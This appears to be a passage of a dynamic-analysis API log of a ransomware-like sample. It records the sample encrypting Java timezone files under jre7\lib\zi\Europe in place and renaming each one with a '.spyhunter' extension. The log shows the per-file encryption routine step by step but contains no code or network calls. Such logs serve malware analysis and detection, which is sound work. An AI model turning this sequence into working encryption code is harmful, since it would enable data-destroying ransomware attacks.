[0168.104] GetProcessHeap () returned 0x2c0000 [0168.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2740 | out: hHeap=0x2c0000) returned 1 [0168.104] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e600 | out: pbBuffer=0x248e600) returned 1 [0168.104] GetProcessHeap () returned 0x2c0000 [0168.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.105] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5f8*=0x30) returned 1 [0168.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\oslo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.301] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo") returned 55 [0168.302] StrStrW (lpFirst="Oslo", lpSrch=".txt") returned 0x0 [0168.302] GetProcessHeap () returned 0x2c0000 [0168.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.302] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5bc*=0x4c0, lpOverlapped=0x0) returned 1 [0168.363] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffb40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.363] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x248e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5bc*=0x4c0, lpOverlapped=0x0) returned 1 [0168.363] GetProcessHeap () returned 0x2c0000 [0168.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.367] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.368] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5bc, lpOverlapped=0x0 | out: lpBuffer=0x248e5fc*, lpNumberOfBytesWritten=0x248e5bc*=0x4, lpOverlapped=0x0) returned 1 [0168.368] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5bc*=0x30, lpOverlapped=0x0) returned 1 [0168.368] CloseHandle (hObject=0x9c) returned 1 [0168.368] GetProcessHeap () returned 0x2c0000 [0168.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.368] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo.spyhunter") returned 65 [0168.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\oslo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\oslo.spyhunter")) returned 1 [0168.369] GetProcessHeap () returned 0x2c0000 [0168.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.369] GetProcessHeap () returned 0x2c0000 [0168.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.369] GetProcessHeap () returned 0x2c0000 [0168.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0730 | out: hHeap=0x2c0000) returned 1 [0168.369] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5f8 | out: pbBuffer=0x248e5f8) returned 1 [0168.369] GetProcessHeap () returned 0x2c0000 [0168.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.369] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5f0*=0x30) returned 1 [0168.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\istanbul"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.374] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul") returned 59 [0168.374] StrStrW (lpFirst="Istanbul", lpSrch=".txt") returned 0x0 [0168.374] GetProcessHeap () returned 0x2c0000 [0168.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.374] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5b4*=0x5b8, lpOverlapped=0x0) returned 1 [0168.426] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffa48, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.426] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x5b8, lpNumberOfBytesWritten=0x248e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5b4*=0x5b8, lpOverlapped=0x0) returned 1 [0168.426] GetProcessHeap () returned 0x2c0000 [0168.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.426] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.426] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5b4, lpOverlapped=0x0 | out: lpBuffer=0x248e5f4*, lpNumberOfBytesWritten=0x248e5b4*=0x4, lpOverlapped=0x0) returned 1 [0168.426] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5b4*=0x30, lpOverlapped=0x0) returned 1 [0168.427] CloseHandle (hObject=0x9c) returned 1 [0168.427] GetProcessHeap () returned 0x2c0000 [0168.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.427] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul.spyhunter") returned 69 [0168.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\istanbul"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Istanbul.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\istanbul.spyhunter")) returned 1 [0168.428] GetProcessHeap () returned 0x2c0000 [0168.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.428] GetProcessHeap () returned 0x2c0000 [0168.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.428] GetProcessHeap () returned 0x2c0000 [0168.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe240 | out: hHeap=0x2c0000) returned 1 [0168.428] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5f8 | out: pbBuffer=0x248e5f8) returned 1 [0168.428] GetProcessHeap () returned 0x2c0000 [0168.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.428] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5f0*=0x30) returned 1 [0168.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\dublin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.429] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin") returned 57 [0168.429] StrStrW (lpFirst="Dublin", lpSrch=".txt") returned 0x0 [0168.429] GetProcessHeap () returned 0x2c0000 [0168.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.429] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5b4*=0x77c, lpOverlapped=0x0) returned 1 [0168.491] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff884, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.491] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x77c, lpNumberOfBytesWritten=0x248e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5b4*=0x77c, lpOverlapped=0x0) returned 1 [0168.492] GetProcessHeap () returned 0x2c0000 [0168.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.492] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.492] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5b4, lpOverlapped=0x0 | out: lpBuffer=0x248e5f4*, lpNumberOfBytesWritten=0x248e5b4*=0x4, lpOverlapped=0x0) returned 1 [0168.492] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5b4*=0x30, lpOverlapped=0x0) returned 1 [0168.492] CloseHandle (hObject=0x9c) returned 1 [0168.492] GetProcessHeap () returned 0x2c0000 [0168.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.492] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin.spyhunter") returned 67 [0168.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\dublin"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\dublin.spyhunter")) returned 1 [0168.498] GetProcessHeap () returned 0x2c0000 [0168.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.498] GetProcessHeap () returned 0x2c0000 [0168.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.498] GetProcessHeap () returned 0x2c0000 [0168.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe0c0 | out: hHeap=0x2c0000) returned 1 [0168.498] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5f0 | out: pbBuffer=0x248e5f0) returned 1 [0168.498] GetProcessHeap () returned 0x2c0000 [0168.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.498] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5e8*=0x30) returned 1 [0168.498] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\chisinau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.499] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau") returned 59 [0168.499] StrStrW (lpFirst="Chisinau", lpSrch=".txt") returned 0x0 [0168.499] GetProcessHeap () returned 0x2c0000 [0168.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.499] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5ac*=0x4bc, lpOverlapped=0x0) returned 1 [0168.607] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffb44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.607] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x248e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5ac*=0x4bc, lpOverlapped=0x0) returned 1 [0168.608] GetProcessHeap () returned 0x2c0000 [0168.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.608] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.608] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5ac, lpOverlapped=0x0 | out: lpBuffer=0x248e5ec*, lpNumberOfBytesWritten=0x248e5ac*=0x4, lpOverlapped=0x0) returned 1 [0168.608] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5ac*=0x30, lpOverlapped=0x0) returned 1 [0168.608] CloseHandle (hObject=0x9c) returned 1 [0168.608] GetProcessHeap () returned 0x2c0000 [0168.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.608] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau.spyhunter") returned 69 [0168.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\chisinau"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\chisinau.spyhunter")) returned 1 [0168.609] GetProcessHeap () returned 0x2c0000 [0168.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.609] GetProcessHeap () returned 0x2c0000 [0168.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.609] GetProcessHeap () returned 0x2c0000 [0168.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe000 | out: hHeap=0x2c0000) returned 1 [0168.609] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5f0 | out: pbBuffer=0x248e5f0) returned 1 [0168.610] GetProcessHeap () returned 0x2c0000 [0168.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.610] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5e8*=0x30) returned 1 [0168.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\budapest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.610] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest") returned 59 [0168.610] StrStrW (lpFirst="Budapest", lpSrch=".txt") returned 0x0 [0168.610] GetProcessHeap () returned 0x2c0000 [0168.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.611] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5ac*=0x520, lpOverlapped=0x0) returned 1 [0168.680] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffae0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.680] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x520, lpNumberOfBytesWritten=0x248e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5ac*=0x520, lpOverlapped=0x0) returned 1 [0168.681] GetProcessHeap () returned 0x2c0000 [0168.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.681] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.681] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5ac, lpOverlapped=0x0 | out: lpBuffer=0x248e5ec*, lpNumberOfBytesWritten=0x248e5ac*=0x4, lpOverlapped=0x0) returned 1 [0168.681] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5ac*=0x30, lpOverlapped=0x0) returned 1 [0168.681] CloseHandle (hObject=0x9c) returned 1 [0168.681] GetProcessHeap () returned 0x2c0000 [0168.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.681] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest.spyhunter") returned 69 [0168.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\budapest"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\budapest.spyhunter")) returned 1 [0168.682] GetProcessHeap () returned 0x2c0000 [0168.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.682] GetProcessHeap () returned 0x2c0000 [0168.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.682] GetProcessHeap () returned 0x2c0000 [0168.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebdf40 | out: hHeap=0x2c0000) returned 1 [0168.682] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5e8 | out: pbBuffer=0x248e5e8) returned 1 [0168.682] GetProcessHeap () returned 0x2c0000 [0168.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.683] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5e0*=0x30) returned 1 [0168.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\bucharest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.683] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest") returned 60 [0168.683] StrStrW (lpFirst="Bucharest", lpSrch=".txt") returned 0x0 [0168.683] GetProcessHeap () returned 0x2c0000 [0168.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.683] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5a4*=0x49c, lpOverlapped=0x0) returned 1 [0168.692] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffb64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.693] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x49c, lpNumberOfBytesWritten=0x248e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e5a4*=0x49c, lpOverlapped=0x0) returned 1 [0168.693] GetProcessHeap () returned 0x2c0000 [0168.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.693] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.693] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5a4, lpOverlapped=0x0 | out: lpBuffer=0x248e5e4*, lpNumberOfBytesWritten=0x248e5a4*=0x4, lpOverlapped=0x0) returned 1 [0168.693] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5a4*=0x30, lpOverlapped=0x0) returned 1 [0168.693] CloseHandle (hObject=0x9c) returned 1 [0168.693] GetProcessHeap () returned 0x2c0000 [0168.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.693] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest.spyhunter") returned 70 [0168.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\bucharest"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\bucharest.spyhunter")) returned 1 [0168.694] GetProcessHeap () returned 0x2c0000 [0168.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.694] GetProcessHeap () returned 0x2c0000 [0168.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0168.694] GetProcessHeap () returned 0x2c0000 [0168.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebbdf8 | out: hHeap=0x2c0000) returned 1 [0168.694] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5e8 | out: pbBuffer=0x248e5e8) returned 1 [0168.694] GetProcessHeap () returned 0x2c0000 [0168.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0168.694] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5e0*=0x30) returned 1 [0168.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\brussels"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.695] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels") returned 59 [0168.695] StrStrW (lpFirst="Brussels", lpSrch=".txt") returned 0x0 [0168.695] GetProcessHeap () returned 0x2c0000 [0168.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.695] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e5a4*=0x61c, lpOverlapped=0x0) returned 1 [0168.836] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff9e4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.836] WriteFile (in: 